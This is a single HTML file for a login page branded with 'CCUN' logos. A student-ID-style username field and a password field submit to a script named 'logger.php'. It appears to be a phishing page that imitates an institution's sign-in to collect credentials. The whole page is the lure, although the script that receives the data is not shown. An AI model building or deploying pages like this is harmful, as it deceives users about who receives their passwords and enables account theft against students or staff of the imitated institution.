<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Login</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      font-family: Arial, sans-serif;
      background: url('ccun-header-logo2.png') no-repeat center center fixed;
      background-size: cover;
    }

    .login-container {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background: url('ccun1.png') no-repeat center center fixed;
      background-size: cover;
    }

    .login-box {
      background:white;
      padding: 40px;
      padding-bottom: 5%;
      width: 370px;
      
      box-shadow: 0 0 15px rgba(0,0,0,0.3);
      text-align: center;
      margin-top: -28%;
      
    }

    .logo {
      width: 350px;
      margin-bottom: 10px;
      background-color: #0B194F;
      border-radius: 5px;
    }

    .login-box h2 {
      font-size: 16px;
      margin-bottom: 20px;
      color: #003366;
      border-radius: 5px;
    }

    input[type="text"],
    input[type="password"] {
      width: 20rem;
      padding: 10px;
      margin: 10px 0;
      border: 1px solid #ccc;
      border-radius: 5px;
      box-shadow: 2px 2px 5px rgba(0,0,0,0.1);
    }

    button {
      width: 21.5rem;
      padding: 10px;
      background-color: #377E21;
      color: white;
      font-weight: bold;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }

    button:hover {
      background-color: #45a049;
    }
  </style>
</head>
<body>
  
  <div class="login-container">
    <form class="login-box" action="logger.php" method="POST">
      <img src="ccun-header-logo2.png" alt="CCUN Logo" class="logo">
    
      <input type="text" name="username" placeholder="e2021784" required>
      <input type="password" name="password" placeholder="Password" required>
      <button type="submit">Log in</button>
    </form>
  </div>
</body>
</html>
